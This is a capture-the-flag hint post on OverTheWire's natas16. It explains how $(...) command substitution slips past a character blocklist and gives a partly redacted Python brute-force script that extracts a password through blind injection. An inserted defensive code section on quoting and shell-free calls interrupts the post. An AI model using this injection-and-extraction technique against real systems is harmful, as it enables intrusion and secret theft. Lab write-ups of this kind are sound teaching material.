natas16 solution / hints


Today, out of nowhere, I suddenly started seeing a huge number of page views to my post on scraping HTML comments with Python. After digging around, I figured out it was coming from some mentions I made regarding using part of that code for solving some of the challenges in the natas wargame from OverTheWire.org.

I normally don’t write about wargame solutions, since the fun is in working out the solution for yourself, but I thought I’d share some more Python code I came up with for natas16 because I’ve seen a bunch of people doing some really nutty things trying to get through it. Here’s my solution – but I warn you I’ve stripped out the keys (so you’ll have to work your way to 16 on your own) and I’ve intentionally made this less than a step-by-step walkthrough.

natas16 starts looking pretty sparse:

If you’ve worked your way through, you’ll see this is pretty similar to the shell code injection challenge you encountered on the way. A quick look at the provided source shows that our imaginary adversary got wise to our injection and has tried to prevent similar exploits in the future:

So here we can see that our submitted key is checked globally, via a regular expression, for the characters ; | & ` ' and " and gets tossed out if any of them is found. That rules out a direct shell injection attack like we used before, right? Well..

A big part of cracking this one relies on the contents of dictionary.txt. A bit of searching through the page shows us that it appears to contain an entry for every letter and every number from 0 to 9. We know from the rules of the game that our target password file is located in /etc/natas_webpass/natas17, but we can’t just inject a “cat” statement into the grep command because of rights issues.

Here comes the fun part. What if we could use results of the parent grep command to signal when we’ve found what we’re looking for in a nested shell command with access to /etc/natas_webpass/natas17? Something like.. nah, you’ll have to figure that part out on your own.
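On the defensive side of the filter described above, here is an added example (my own illustration, not code from the original post or from the natas challenge) that contrasts the metacharacter blocklist with argument-level handling. The regex and the grep command line are assumptions modelled on the post's description of the challenge source.

```python
import re
import shlex

# Blocklist modelled on the post's description: reject ; | & ` ' and " anywhere in the key.
BLOCKLIST = re.compile(r"[;|&`'\"]")

def blocklist_allows(needle: str) -> bool:
    """True if the weak filter would let this needle through to the shell command."""
    return BLOCKLIST.search(needle) is None

def build_shell_command(needle: str) -> str:
    """The fragile pattern the filter tries to protect: user input interpolated into a
    shell string. Command substitution survives the blocklist, so the shell still evaluates it."""
    return 'grep -i "%s" dictionary.txt' % needle

def build_quoted_command(needle: str) -> str:
    """If a shell string is unavoidable: shlex.quote single-quotes the value, and '--'
    keeps a needle such as '-r' from being parsed as a grep option."""
    return "grep -i -- %s dictionary.txt" % shlex.quote(needle)

def build_argv(needle: str) -> list:
    """Preferred: hand this argv to subprocess.run(..., shell=False); no shell parses the needle."""
    return ["grep", "-i", "--", needle, "dictionary.txt"]

def search_lines(needle: str, lines) -> list:
    """No-shell alternative: do the case-insensitive match in-process, so '$(...)' is just text."""
    n = needle.lower()
    return [line for line in lines if n in line.lower()]

# Constructed stand-in for dictionary.txt.
DICTIONARY = ["apple", "Banana", "cherry", "0", "1"]

if __name__ == "__main__":
    probe = "$(id)"  # harmless command substitution, used only to show what the blocklist misses
    print("blocklist lets probe through:", blocklist_allows(probe))
    print("fragile:", build_shell_command(probe))
    print("quoted :", build_quoted_command(probe))
    print("argv   :", build_argv(probe))
    print("in-process search:", search_lines("an", DICTIONARY))
```

The point to take away is that a blocklist only enumerates the metacharacters someone thought of; quoting or, better, not invoking a shell at all removes the interpretation step entirely.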

When you do, you’ll probably discover that it would take a decent amount of time to try each and every letter for each and every position *coughHINTcough*. It would be pretty nice if we could whip up a Python script to do the hard work for us. It’s worth mentioning that the way I detected a success was by the lack of results from a search. Here’s my script:

import requests
import string

# Credentials and target; the natas16 key is intentionally stripped from the post.
auth = ("natas16", "Key_To_natas16")
url = "http://natas16.natas.labs.overthewire.org/index.php"
s = requests.Session()
s.auth = auth
data = {}
characterPool = string.ascii_letters + string.digits

# "magicCommand" stands in for the real nested command. The %s marks where the
# guessed prefix (password + c) is substituted on each attempt; its exact position
# depends on the command you work out for yourself.
submission = '$(magicCommand %s /etc/natas_webpass/natas17)'
password = ""

for i in range(1, 32):
    for c in characterPool:
        data["needle"] = submission % (password + c)
        r = s.post(url, data=data).content
        # Success is detected by the lack of results: the response length of an empty search.
        if len(r) == 473:
            password += c
            print("Col: ", i, " Pass: ", password)
            break

print("Complete: ", password)

Obviously I’ve removed the key to natas16 which you can retrieve from natas16, and I’ve substituted the “magicCommand” for my hypothetical string, but if you look at the structure of this script it should give you some strong indications about how to go about solving natas16 (without dropping the solution right in your lap turnkey). If you can’t figure it out from the above, or if you can’t even make it to 16, shoot me an email or message me on Twitter and I’d be happy to try to give you a few more hints.